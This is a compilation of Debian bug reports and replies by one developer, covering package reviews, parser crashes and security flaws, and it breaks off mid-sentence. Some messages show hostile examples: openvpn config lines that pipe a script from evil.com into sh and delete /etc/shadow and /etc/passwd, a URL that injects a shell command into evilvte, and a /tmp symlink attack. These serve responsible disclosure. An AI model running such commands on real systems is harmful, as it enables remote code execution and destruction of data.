Bug#910279: ITP: optimesh -- Mesh optimization, mesh smoothing.

[Steve Kemp]

>   Description : Mesh optimization, mesh smoothing.
> 
> Several mesh smoothing/optimization methods with one simple interface. 
> optimesh
>  -   is fast,
>  -   preserves submeshes,
>  -   only works for triangular meshes (for now; upvote this issue if you're 
> interested in tetrahedral mesh smoothing), and

  I suspect this description should be updated, if only because "this
 issue" isn't a link that users could follow.

Steve
-- 
https://steve.fi/

Bug#865105: gitlab: leaves stale systemd service symlinks after purge

[Steve Kemp]

  Your bug report is correct, but it is really just a more specific
 example of the problem already reported in #863960:

https://bugs.debian.org/863960

Steve
-- 
https://steve.fi/

Bug#890816: ITP: autovpn -- Connect to a VPN in a country of your choice

[Steve Kemp]

On Mon Feb 19, 2018 at 12:44:40 +0100, Michael Meskes wrote:

> >   * It relies upon the external VPNGate.net site/service.  If this
> > goes away in the lifetime of a stable Debian release users will
> > be screwed.
> 
> That is actually a good point. I wonder if using a local copy might be
> a good alternative.

  If you're willing to maintain such a list, resyncing it every
 few days/months to reap dead-entries and add new ones then that
 would be good.

> >   * It allows security attacks against the local system, which other
> > users on the host could exploit via symlink attacks on
> > /tmp/openvpnconf
> 
> True, but this could be handled by using a better system to access a
> temp file.

  Sure.  If you changed the code to use ioutil.TempFile, or some
 other secure alternative that specific objection will go away.

> > 1.  The tool downloads a remote URL to /tmp/openvpnconf
> > 
> > 2.  The file is then given as an argument to the command:
> > sudo openvpn /tmp/openvpnconf
> > 
> > 3.  That generated/downloaded openvpn configuration file could
> >be written to do anything, up to and including `rm -rf /`.
> 
> Can you actually get openvpn to do this?

  Yes.  For example these snippets will do what you fear they will:

script-security 2
up curl http://evil.com/root-me.sh | sh
up rm /etc/shadow
down rm -f /etc/passwd

> I read this not as "insecure for the system it runs on" but "insecure
> on the connection side". This is certainly not something you should use
>   to open your local network to, or to do something illegal.

  As per the insecure fixed name, and the execution of commands from
 a remote HTTP-site (not even SSL!) I think it is insecure in all
 regards.

  Also I guess you'll need to change the script to remove "sudo", or
 better yet add a restricted user with sudo's nopasswd setup for it
 (shudder).

Steve
-- 
https://www.steve.org.uk/

Bug#890816: ITP: autovpn -- Connect to a VPN in a country of your choice

[Steve Kemp]

>   Version : 0.0~git20170129.72dd7f6-1
>   Upstream Author : Adhityaa C 
> * URL : https://github.com/adtac/autovpn
..
> autovpn is a tool to automatically connect you to a random VPN
> in a country of your choice. It uses openvpn to connect you to a server
> obtained from VPN Gate (http://www.vpngate.net/en/).

  I'd strongly urge you to reconsider packaging this project, for
 three main reasons:

  * It relies upon the external VPNGate.net site/service.  If this
goes away in the lifetime of a stable Debian release users will
be screwed.

  * It allows security attacks against the local system, which other
users on the host could exploit via symlink attacks on /tmp/openvpnconf

  * It allows security attacks on against the local system which the
remote service could exploit:

1.  The tool downloads a remote URL to /tmp/openvpnconf

2.  The file is then given as an argument to the command:
sudo openvpn /tmp/openvpnconf

3.  That generated/downloaded openvpn configuration file could
   be written to do anything, up to and including `rm -rf /`.

> A small tool that comes handy in particular for people who travel a lot. Will
> be maintained in the go-team.

  Finally the project itself notes:

"This is completely insecure. Please do not use this for anything
important. Get a real and secure VPN. This is mostly a fun tool to
get a VPN for a few minutes."

Steve
-- 

Bug#883075: ITP: memleax -- debug a running process for memoy leaks without recompiling or restarting

[Steve Kemp]

> Description : debug a running process for memoy leaks without
> recompiling or restarting

  Typo: "memory", not "memoy".

>  Memleax debugs a program for memory leaks by attaching to a running process,
>  similarly to how gdb's does. It then hooks into the target process's
>  invocation of memory allocation and free, and reports in real time the
>  memory blocks that it identifies as memory leaks. 

  This section doesn't could be rewritten for clarity, the "'s" are
 wrong either way.

>  The default expiration threshold is 10 seconds; however, you should
>  always set this with the -e option according to your scenarios.

  This doesn't need to be in the package description.

>  It is very convenient to use, and is suitable for production
>  environments.

  Sounds like a nice tool indeed, thanks for packaging it :)

>  and then kill memleax (e.g. sent it a SIGINT with Ctrl-C) to stop
>  monitoring.

  "sent" -> "send".  But again this probably doesn't need to be in the
 description.

>  Differences from Valgrind:
>  .
>  * Valgrind starts the target process, while memleax attaches to on that is
>already running.

  Nor this.


Steve
-- 
https://www.steve.org.uk/

Bug#873292: facter: Bogus output received with interface named 'master'.

[Steve Kemp]

Package: facter
Version: 2.4.6-1
Severity: minor

Dear Maintainer,

Since upgrading a virtual-machine host from jessie to stretch I started
seeing this email every hour, when puppet ran:

To: root
From: root(Cron Daemon)
Cc:
Subject: Cron  /usr/bin/puppet agent --onetime  ..

Command line is not complete. Try option "help"

I eventually tracked this output down to factor, as I could see it when
running `facter --debug`:

root@smaug ~ # facter --debug
Found no suitable resolves of 1 for ec2_metadata
..
value for macaddress_lo is still nil
value for ipaddress_master is still nil
value for ipaddress6_master is still nil
Command line is not complete. Try option "help"
value for netmask_master is still nil
value for ipaddress_skx_mail is still nil

Eventually I tracked this output down to the following function :

   def self.get_bonding_master(interface)

(Which is present in /usr/lib/ruby/vendor_ruby/facter/util/ip.rb)

That runs:

ip link show $interface

On my host that works for most interfaces, but not for master:

root@smaug ~ # ip link show master
Command line is not complete. Try option "help"

To resolve the problem I updated the code of that function from:

ethbond = regex.match(%x{/sbin/ip link show '#{interface}'})

To:

ethbond = regex.match(%x{/sbin/ip link show dev '#{interface}'})

I'm not 100% sure this is a bug, but I think it probably is ..



-- System Information:
Debian Release: 8.9
  APT prefers oldstable-updates
  APT policy: (500, 'oldstable-updates'), (500, 'oldstable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.16.0-4-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) (ignored: LC_ALL 
set to en_US.UTF8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Bug#854585: Acknowledgement (evilvte: Allows executing (unexpected) commands via mouse-clicks)

[Steve Kemp]

Tags: patch

One approach at solving this problem would be to stop
highlighting the URL at the first "'" character.

This matches what gnome-terminal, and others, do already
even though I don't believe this character _should_ be
escaped.

This can be achieved by updating the regexp:


deagol ~/evilvte/src $ diff --unified macro2.h macro2.h.new 
--- macro2.h2017-02-09 07:40:21.972749915 +0200
+++ macro2.h.new2017-02-09 07:40:38.256749654 +0200
@@ -130,7 +130,7 @@
 #define LABEL_SUBMENU_IME "_Input Methods"
 #endif
 
-#define MATCH_HTTP_DATA "((f|F)|(h|H)(t|T))(t|T)(p|P)(s|S)?://(([^|.< 
\t\r\n\\\"]*([.][^|< \t\r\n\\\"])?[^|.< \t\r\n\\\"]*)*[^< \t\r\n,;|\\\"]*[^|.< 
\t\r\n\\\"])?/*"
+#define MATCH_HTTP_DATA "((f|F)|(h|H)(t|T))(t|T)(p|P)(s|S)?://(([^|.< 
\t\r\n\\\"']*([.][^|< \t\r\n\\\"'])?[^|.< \t\r\n\\\"']*)*[^< 
\t\r\n,;|\\\"']*[^|.< \t\r\n\\\"'])?/*"
 #define MATCH_FILE_DATA "(f|F)(i|I)(l|L)(e|E):///(([^|.< \t\r\n\\\"]*([.][^|< 
\t\r\n\\\"])?[^|.< \t\r\n\\\"]*)*[^< \t\r\n,;|\\\"]*[^|.< \t\r\n\\\"])?/*"
 #define MATCH_MAIL_DATA "(m|M)(a|A)(i|I)(l|L)(t|T)(o|O):(([^|.< 
\t\r\n\\\"]*([.][^|< \t\r\n\\\"])?[^|.< \t\r\n\\\"]*)*@[^< \t\r\n,;|\\\"]*[^|.< 
\t\r\n\\\"])?/*"
 

That probably needs a sanity-check from the maintainer/upstream
somebody else.  I've just added ' everywhere I saw ".

Steve
--

Bug#854585: evilvte: Allows executing (unexpected) commands via mouse-clicks

[Steve Kemp]

Package: evilvte
Version: 0.5.1-1
Severity: important
Tags: security

Dear Maintainer,

Although a terminal is designed to execute commands it is unexpected
that clicking on hyperlinks would execute arbitrary code, and
unfortunately that is trivially possible.

Consider the following hyperlink:

   http://example.com';touch$IFS/tmp/blah'

If that is displayed in the shell it will be highlighted, completely,
and clicking upon it will do two things:

* open http://example.com/ in the users' browser (firefox).
* Create the file /tmp/blah

This comes from one of several regions of the code:


g_snprintf(new_window_str, sizeof(new_window_str), "%s '%s' &", 
MATCH_STRING_L, matched_url);
  system(new_window_str);

Or:

  char new_window_str[256];
  if (event->button == 2)
g_snprintf(new_window_str, sizeof(new_window_str), "%s '%s' &", 
MATCH_STRING_M, matched_url);
  system(new_window_str);

An evil attacker could use this to send a link by email, which would
be displayed via mutt/lumail/rmail/etc, and thus the user would click
upon it.

Mitigating factors: The string is capped to 240 characters or so, once
you remove "firefix '...'&" from the string.  So if a user has a
sufficiently wide terminal they might be OK ;)

Finally there is a simpler way opening a new window could also do evil things,
due to the use of `default_directory`:

g_snprintf(new_window_str, sizeof(new_window_str), "cd '%s' ; %s &", 
default_directory, PROGRAM_NAME);
system(new_window_str);


I'd suggest a decent audit of all uses of `system` to catch these flaws, but
I'd expect both of these flaws would qualify for CVE identifiers ..


-- System Information:
Debian Release: 8.7
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.16.0-4-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) (ignored: LC_ALL 
set to en_US.UTF8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages evilvte depends on:
ii  libc6 2.19-18+deb8u7
ii  libglib2.0-0  2.42.1-1+b1
ii  libgtk2.0-0   2.24.25-3+deb8u1
ii  libvte9   1:0.28.2-5

evilvte recommends no packages.

evilvte suggests no packages.

-- no debconf information

Bug#843120: ITP: freight -- easy-to-understand shell script to handle APT repositories

[Steve Kemp]

On Fri Nov 04, 2016 at 02:10:56 +0100, Nicolas Braud-Santoni wrote:

>   Description : easy-to-understand shell script to handle APT repositories
>  freight is an easy-to-use and to understand shell script for
>  building packages and keeping them in an up-to-date and signed
>  reporitory.

  Minor issue - but that should be "repository".
 
Steve
-- 
https://steve.fi/


signature.asc
Description: Digital signature

Bug#820373: w3m: SEGFAULT on bogus HTML

[Steve Kemp]

> Fixed, thank you.
> 
>   - 
> https://anonscm.debian.org/cgit/collab-maint/w3m.git/commit/?id=5a159af05d8556a3f9f8f1a42d8fc153ffbc9694
> 

  I confirm that fixes the problem.  Thanks once more for your
 prompt attention.

> Welcome to add more info, so that I'll confirm the problems are
> really fixed.

  Sure thing. I will do so next time.

  All my current samples are fixed; I'll start searching again.

Steve
-- 

Bug#820373: w3m: SEGFAULT on bogus HTML

[Steve Kemp]

Package: w3m
Version: 0.5.3-19
Severity: important
Tags: security

Dear Maintainer,

Please find attached a pair of files, each of these cause w3m to
segfault when run as follows:

   cat $file | w3m -dump

The crash is a segfault, which is probably not exploitable but may
be to somebody who puts in more effort than I did!

On the face of it this is a minor/normal bug, until you consider
the case of users who run mutt and use w3m to convert HTML emails
to plaintext, that situation is common and as such I've raised the severity.

The crashes both have a similar backtrace:

(gdb) bt
#0  wc_N_to_johab1 (code=4294963072) at johab.c:163
#1  wc_cs128w_to_johab (cc=...) at johab.c:234
#2  0x00715106 in wtf_parse1 (p=) at wtf.c:454
#3  0x00716125 in wtf_parse (p=p@entry=0x7fffee1aa9f8) at wtf.c:473
#4  0x006d4b8b in wc_conv_to_ces (ces=0, is=0x125b5e0) at conv.c:93
#5  wc_Str_conv (is=is@entry=0x125b5e0, f_ces=,
t_ces=t_ces@entry=3178565) at conv.c:23
#6  0x004ba1ea in _saveBuffer (buf=buf@entry=0x125ce00, l=0x1260f60,
f=0x7fac731162a0 <_IO_2_1_stdout_>, cont=cont@entry=0) at file.c:7595
#7  0x004ba726 in saveBuffer (buf=buf@entry=0x125ce00,
f=, cont=cont@entry=0) at file.c:7613
#8  0x00414ec2 in do_dump (buf=0x125ce00) at main.c:1337
#9  0x00407b25 in main (argc=0, argv=0x125b980,
envp=0x6f74a6 ) at main.c:1043


PS. I have more samples that crash in the same area of code, I suspect that 
they will all be fixed at once as per #820162, so I'm only sharing a pair of 
files.


Steve
--


-- System Information:
Debian Release: 8.4
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.16.0-4-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) (ignored: LC_ALL 
set to en_US.UTF8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages w3m depends on:
ii  libc62.19-18+deb8u4
ii  libgc1c2 1:7.2d-6.4
ii  libgpm2  1.20.4-6.1+b2
ii  libssl1.0.0  1.0.1k-3+deb8u4
ii  libtinfo55.9+20140913-1+b1
ii  zlib1g   1:1.2.8.dfsg-2+b1

Versions of packages w3m recommends:
ii  ca-certificates  20141019+deb8u1

Versions of packages w3m suggests:
pn  cmigemo   
ii  man-db2.7.0.2-5
ii  mime-support  3.58
pn  w3m-el
pn  w3m-img   

-- no debconf information
ÿ0ÿÿ‡ÿ0ÿÿ‡

Bug#820162: w3m: SEGFAULT on bogus HTML

[Steve Kemp]

On Thu Apr 07, 2016 at 06:51:52 +0900, Tatsuya Kinoshita wrote:

> > Confirmed, thank you.
> 
> Fixed in the development repo.
> 
>   - 
> https://anonscm.debian.org/cgit/collab-maint/w3m.git/commit/?id=7bb2a4671503c41d63989dcef9ef54dea0c73b43
> 
> Will be fixed in the next upload for unstable.

  Thanks for your prompt attention, and fix!

Steve
-- 
http://www.steve.org.uk/

Bug#820162: w3m: SEGFAULT on bogus HTML

[Steve Kemp]

Package: w3m
Version: 0.5.3-19
Severity: important
Tags: security

Dear Maintainer,

Please find attached a tarball which contains two files, a generated
one, and one which has been reduced to the smallest possible test-case.
Each of those files causes w3m to segfault when run as follows:

   cat $file | w3m -dump

The crash is a segfault, which is probably not exploitable but may
be to somebody who puts in more effort than I did!

On the face of it this is a minor/normal bug, until you consider
the case of users who run mutt and use w3m to convert HTML emails
to plaintext, that situation is common and as such I've raised the severity.

The crash is in some horrible code which is converting the file
to UTF-8, as the following backtrace shows:

(gdb) bt
#0  wc_any_to_ucs (cc=...) at ucs.c:274
#1  0x0070d73a in wc_push_to_utf8 (os=os@entry=0xed8940, cc=...,
st=st@entry=0x7fff11c174c0) at utf8.c:276
#2  0x006d4b9b in wc_conv_to_ces (ces=0, is=0xed8960) at conv.c:93
#3  wc_Str_conv (is=is@entry=0xed8960, f_ces=,
t_ces=t_ces@entry=3178565) at conv.c:23
#4  0x004ba1ea in _saveBuffer (buf=buf@entry=0xed9e00, l=0xeddf60,
f=0x7efc1c5ce2a0 <_IO_2_1_stdout_>, cont=cont@entry=0) at file.c:7595
#5  0x004ba726 in saveBuffer (buf=buf@entry=0xed9e00,
f=, cont=cont@entry=0) at file.c:7613
#6  0x00414ec2 in do_dump (buf=0xed9e00) at main.c:1337
#7  0x00407b25 in main (argc=-1, argv=0xed8a00, envp=0x8800)
at main.c:1043


Mitigating factors?  Interestingly the following does NOT crash:

   w3m -dump $file

Steve
--
https://www.steve.org.uk/


-- System Information:
Debian Release: 8.3
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.16.0-4-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) (ignored: LC_ALL 
set to en_US.UTF8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages w3m depends on:
ii  libc62.19-18+deb8u3
ii  libgc1c2 1:7.2d-6.4
ii  libgpm2  1.20.4-6.1+b2
ii  libssl1.0.0  1.0.1k-3+deb8u4
ii  libtinfo55.9+20140913-1+b1
ii  zlib1g   1:1.2.8.dfsg-2+b1

Versions of packages w3m recommends:
ii  ca-certificates  20141019+deb8u1

Versions of packages w3m suggests:
pn  cmigemo   
ii  man-db2.7.0.2-5
ii  mime-support  3.58
pn  w3m-el
pn  w3m-img   

-- no debconf information


crash.tar.gz
Description: application/gzip

Bug#816277: gawk: Invalid program crashes the parser

[Steve Kemp]

Package: gawk
Version: 1:4.1.1+dfsg-1
Severity: important

Dear Maintainer,

The following wonderful program causes an immediate segfault in the 
parse-process of gawk:

for (i = ) in foo bar baz

For example:

shelob ~ $ cat t.gawk 
for (i = ) in foo bar baz
shelob ~ $ gawk -f t.gawk
gawk: t.gawk:1: for (i = ) in foo bar baz
gawk: t.gawk:1: ^ syntax error
gawk: t.gawk:1: for (i = ) in foo bar baz
gawk: t.gawk:1:  ^ syntax error
gawk: t.gawk:1: fatal error: internal error: segfault
Aborted

This error comes from a NULL-pointer dereference in awkgram.yy, around line 
1350:

if ($1->lasti->opcode == Op_concat) {
/* multiple (> 2) adjacent strings optimization */


The following patch turns this into an immediate exit, rather than dereference
of $1->lasti (which is NULL):


--- /home/skx/gawk-4.1.1+dfsg/awkgram.y 2014-03-05 06:00:36.0 +0200
+++ awkgram.y   2016-02-29 13:50:43.239771376 +0200
@@ -1343,6 +1343,10 @@
int count = 2;
bool is_simple_var = false;
 
+if ( ( $1 == NULL ) || ($1->lasti == NULL ) ) {
+yyerror("Fatal error");
+YYABORT;
+}
if ($1->lasti->opcode == Op_concat) {
/* multiple (> 2) adjacent strings optimization */
is_simple_var = ($1->lasti->concat_flag & CSVAR);




-- System Information:
Debian Release: 8.3
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.16.0-4-amd64 (SMP w/4 CPU cores)
Locale: LANG=C, LC_CTYPE=C (charmap=UTF-8) (ignored: LC_ALL set to en_US.UTF8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages gawk depends on:
ii  libc6 2.19-18+deb8u3
ii  libgmp10  2:6.0.0+dfsg-6
ii  libmpfr4  3.1.2-2
ii  libreadline6  6.3-8+b3
ii  libsigsegv2   2.10-4+b1

gawk recommends no packages.

Versions of packages gawk suggests:
pn  gawk-doc  

-- no debconf information

Bug#816271: gawk: It should not be possible to segfault gawk

[Steve Kemp]

Package: gawk
Version: 1:4.1.1+dfsg-1
Severity: important

Dear Maintainer,

While I appreciate that passing untrusted code to gawk is not a common thing to 
do, I do not believe that it should be possible to trigger a segfault though.

The following "program" will crash gawk though:

 $ echo | gawk  '{ print( @olower( "steve" ) ) }'
 gawk: cmd. line:1: (FILENAME=- FNR=1) fatal error: internal error: segfault
 Aborted

The specific problem here is the error-handling in `interpret.h`, which 
contains the following code:

if (f == NULL || f->type != Node_func) {
if (f->type == Node_ext_func || f->type == Node_old_ext_func)
fatal(_("cannot (yet) call extension functions 
indirectly"));
else
fatal(_("function called indirectly through `%s' does not 
exist"),
pc->func_name); 
}
pc->func_body = f; /* save for next call */

The first condition says:

* If f is NULL
* OR f->type != ..

Assume f is NULL, then the very next line reads:

if ( f->type ==  )

Which is an immediate segfault!  One possible patch would be to change this:

   if (f->type == Node_ext_func || f->type == Node_old_ext_func)

To the following, to explicitly look for a non-NULL f:

   if ( f && (f->type == Node_ext_func || f->type == 
Node_old_ext_func) )



-- System Information:
Debian Release: 8.3
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.16.0-4-amd64 (SMP w/4 CPU cores)
Locale: LANG=C, LC_CTYPE=C (charmap=UTF-8) (ignored: LC_ALL set to en_US.UTF8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages gawk depends on:
ii  libc6 2.19-18+deb8u3
ii  libgmp10  2:6.0.0+dfsg-6
ii  libmpfr4  3.1.2-2
ii  libreadline6  6.3-8+b3
ii  libsigsegv2   2.10-4+b1

gawk recommends no packages.

Versions of packages gawk suggests:
pn  gawk-doc  

-- no debconf information

Bug#810883: catdoc: Invalid memory access and segfaulting

[Steve Kemp]

> Fair enough. In any case, I am going to upload to backports as soon as
> the version in sid stabilises.

  Great.

> Well, I think a DSA would be too much for a tool like this :) Specially
> since there has not been any PoC to show a real security issue.

  I won't try to force it, but I'd certainly consider it worthy of
 such a thing.  Just because people, like me, use catdoc in their
 console-mail clients to read arbitrary/untrusted documents received.

  If there is even a hint that memory corruption can lead to code
 execution that's a severe problem.

> like to lower the severity of this bug, but I would gladly keep it if
> you can find a real threat there.

  I suspect the only way to know for sure is to develop an exploit,
 and memory-corruption issues are something I've not touched for
 a while - buffer overflows are much easier to reason about!

> Thanks for the test file. i will debug this and try to come up with a fix.

  Great.  I have about twenty more files that crash the version of
 catdoc available to sid.  I will wait to see your fix, and once posted
 I'll test the current samples against them, I expect that some of them are
 non-unique.
 
Steve
-- 

Bug#810883: catdoc: Invalid memory access and segfaulting

[Steve Kemp]

On Wed Jan 13, 2016 at 18:08:44 -0300, Martín Ferrari wrote:

> > When running under valgrind we see that an attempt is made to access
> > an invalid pointer:
> 
> This is a known issue (#679877), it was fixed when I took over this
> package, and it has already reached testing.

  Having the fixed package reach testing is good for users running
 testing, but not much use to people running stable/jessie as I am.

  I think that this is certainly a bug worthy of a DSA, or update
 in the next point-release.  Memory corruption via reading a file
 smells like a security issue.

> with the latest catdoc, and it does not segfault.
> Can you verify this?

  Yes.  Latest catdoc doesn't segfault with `x.doc`, but continues
 to segfault with `xx.doc` (attached).

Steve
-- 


xx.doc.gz
Description: application/gzip

Bug#810883: catdoc: Invalid memory access and segfaulting

[Steve Kemp]

Package: catdoc
Version: 0.94.4-1.1
Severity: important
Tags: security

Dear Maintainer,

The attached word document will cause catdoc to crash when executed:

 catdoc x.doc

When running under valgrind we see that an attempt is made to access
an invalid pointer:

==6875== Invalid read of size 8
==6875==at 0x41B91D: map_subst (substmap.c:151)
==6875==by 0x417E08: convert_char (charsets.c:241)
==6875==by 0x4064E0: copy_out (reader.c:82)
==6875==by 0x40A807: analyze_format (analyze.c:75)
==6875==by 0x40378B: main (catdoc.c:180)
==6875==  Address 0xd221cf8 is not stack'd, malloc'd or (recently) free'd

Running under gdb we see this is the area of code in question:

(gdb) run ~/x.doc
Starting program: /home/steve/inst/bin/catdoc x.doc

Program received signal SIGSEGV, Segmentation fault.
0x0041b91d in map_subst (map=0x6ad1a0, uc=uc@entry=-1)
at substmap.c:151
151 char **p=map[(unsigned)uc >>8];
(gdb) bt
#0  0x0041b91d in map_subst (map=0x6ad1a0, uc=uc@entry=-1)
at substmap.c:151
#1  0x00417e09 in convert_char (uc=-1) at charsets.c:241
#2  0x004064e1 in copy_out (f=f@entry=0x6aec90,
header=header@entry=0x7fffe340 "P\317\021\340\241\261\032\341\032")
at reader.c:82
#3  0x0040a808 in analyze_format (f=f@entry=0x6aec90) at analyze.c:75
#4  0x0040378c in main (argc=, argv=)
at catdoc.c:180


I'm reporting this as "important" because I believe that running
catdoc on untrusted input should not result in a segfault.  It may
be a security-sensitive issue too, although that is not 100%
confirmed.


-- System Information:
Debian Release: 8.2
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.16.0-4-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.utf8, LC_CTYPE=en_US.utf8 (charmap=UTF-8) (ignored: LC_ALL 
set to en_US.UTF8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages catdoc depends on:
ii  libc6  2.19-18+deb8u1

catdoc recommends no packages.

Versions of packages catdoc suggests:
ii  tk [wish]  8.6.0+8

-- no debconf information



x.doc.gz
Description: application/gzip

Bug#809252: node-cli: insecure use of temporary files

[Steve Kemp]

Package: node-cli
Version: 0.4.4~20120516-1
Severity: critical
Tags: security

Dear Maintainer,

The `node-cli` library makes insecure use of the following two
temporary files:

lock_file = '/tmp/' + cli.app + '.pid',
log_file = '/tmp/' + cli.app + '.log';

These allow overwriting files  that the starting-user has permission
to modify.



-- System Information:
Debian Release: 8.2
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.16.0-4-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.utf8, LC_CTYPE=en_US.utf8 (charmap=UTF-8) (ignored: LC_ALL 
set to en_US.UTF8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Bug#808730: stalin: Insecure use of temporary files

[Steve Kemp]

Package: stalin
Version: 0.11-5
Severity: critical
Tags: security


When `stalin` launches it attempts to detect its environment via
the following code in /usr/lib/stalin/QobiScheme.sc:

   
(system "uname -m >/tmp/QobiScheme.tmp")
...
(system "rm -f /tmp/QobiScheme.tmp"))

This is a prime example of the insecure use of temporary files,
and allows overwriting any file owned by the user who invokes
stalin.

Trivial demonstration:


$ ln -s /home/steve/HACK /tmp/QobiScheme.tmp
$ ls -l /home/steve/HACK
ls: cannot access /home/steve/HACK: No such file or directory

Now run the sample code:


$ cd /tmp/stalin-0.11/benchmarks
$ ./make-hello

And we see this:

$ ls -l /home/steve/HACK
-rw-r--r-- 1 steve steve 6 Dec 22 08:30 /home/steve/HACK



-- System Information:
Debian Release: 8.2
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.16.0-4-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) (ignored: LC_ALL 
set to en_US.UTF8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages stalin depends on:
ii  dpkg-dev   1.17.26
ii  libc6  2.19-18+deb8u1
ii  libgc-dev  1:7.2d-6.4

stalin recommends no packages.

stalin suggests no packages.

-- no debconf information


Steve
-- 

Bug#801530: openssh-client: Segfault on malformed keys - possible security impact

[Steve Kemp]

  The following patch seems to me to be a reasonable stab at fixing
 the NULL pointer dereference.

  Tested on Debian Jessie (amd64), against keys of type:

* dsa
* ecdsa
* ed25519
* rsa
* rsa1

  On a valid key it shows the fingerprint.  On my bogus sample it shows:

  line 2 too long: 4...
  /home/steve/fuz/output/crashes/crash.min.pub is not a public key file.

  Patch below.  Feel free to include/rework.

Steve
-- 


--- sshkey.c.orig   2015-10-13 22:42:26.178252307 +0300
+++ sshkey.c2015-10-13 22:42:58.781080815 +0300
@@ -1198,6 +1198,9 @@
bits == 0 || bits > SSHBUF_MAX_BIGNUM * 8)
return SSH_ERR_INVALID_FORMAT;  /* Bad bit count... */
 
+if ( ret->rsa == NULL )
+return SSH_ERR_INVALID_FORMAT;
+
/* Get public exponent, public modulus. */
if ((r = read_decimal_bignum(&ep, ret->rsa->e)) < 0)
return r;

Bug#801530: openssh-client: Segfault on malformed keys - possible security impact)

[Steve Kemp]

> .. and the exciting-looking address is apparently a typical load address
> for the ssh binary.

  Yes.  It was in the ascii-range, which made me more optimistic.

  (I'm too used to using AAA..AAA as input and seeing 0x41. 0x55 looks
 close enough to be plausible.)

Steve
--

Bug#801530: openssh-client: Segfault on malformed keys - possible security impact

[Steve Kemp]

  I'm almost embarrassed to say that I submitted the wrong reproducer
 in my original bug report.

  The previous key does trigger the fault, but it is needlessly complex.
 The attachment to this mail should be considered a saner example, as it
 still triggers the crash, but it is is significantly shorter.

Steve
-- 
rsa1 
6

Bug#801530: openssh-client: Segfault on malformed keys - possible security impact

[Steve Kemp]

Package: openssh-client
Version: 1:6.7p1-5
Severity: important
Tags: security

Dear Maintainer,

I believe that the sanest way to generate an SSH fingerprint, for display
to users, etc, is via executing:

ssh-keygen -l -f path/to/public.key

This is the rationale behind the following blog-post:

http://blog.steve.org.uk/generating_fingerprints_from_ssh_keys.html

The gzipped key attached to this email, generated via magical-fuzzing,
will result in a segfault, and a suspicious EIP setting.  This may
indicate code-execution possiblities, and so should probably have
a CVE identifier assigned.

Demonstration is as simple as:

helsinki ~ $ ssh-keygen -l -f ~/key.trigger.pub
Segmentation fault

The backtrace shows EIP as 0x5556807e, which looks at least
partially controllable.  I've not yet delved into the details.



-- System Information:
Debian Release: 8.2
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.16.0-4-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.utf8, LC_CTYPE=en_US.utf8 (charmap=UTF-8) (ignored: LC_ALL 
set to en_US.UTF8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages openssh-client depends on:
ii  adduser   3.113+nmu3
ii  dpkg  1.17.25
ii  libc6 2.19-18+deb8u1
ii  libedit2  3.1-20140620-2
ii  libgssapi-krb5-2  1.12.1+dfsg-19
ii  libselinux1   2.3-2
ii  libssl1.0.0   1.0.1k-3+deb8u1
ii  passwd1:4.2-3
ii  zlib1g1:1.2.8.dfsg-2+b1

Versions of packages openssh-client recommends:
ii  xauth  1:1.0.9-1

Versions of packages openssh-client suggests:
pn  keychain  
pn  libpam-ssh
pn  monkeysphere  
pn  ssh-askpass   

-- Configuration Files:
/etc/ssh/ssh_config changed [not included]

-- no debconf information


key.trigger.pub.gz
Description: application/gzip

Bug#772473: Acknowledgement (xbindkeys-config: Insecure use of temporary files)

[Steve Kemp]

  Sorry for the slow reply, I wasn't Cc'd so I didn't see your reply.


> Did you request a CVE for it already?

  No, I did not.

> make me believe that the trust boundaries are not crossed here, thus
> I suppose it will be tracked as a secuirity hardening issue, and not a
> flaw.
> What do you think?

  I suspect this program is only useful on a desktop system, and such
 systems might have multiple users.  On that basis the flaw could allow
 user "a" to truncate/destroy files belonging to user "b", which is
 a boundary-cross.  Unless I misunderstand how you use the term?

  I think that traditionally insecure uses of temporary files are
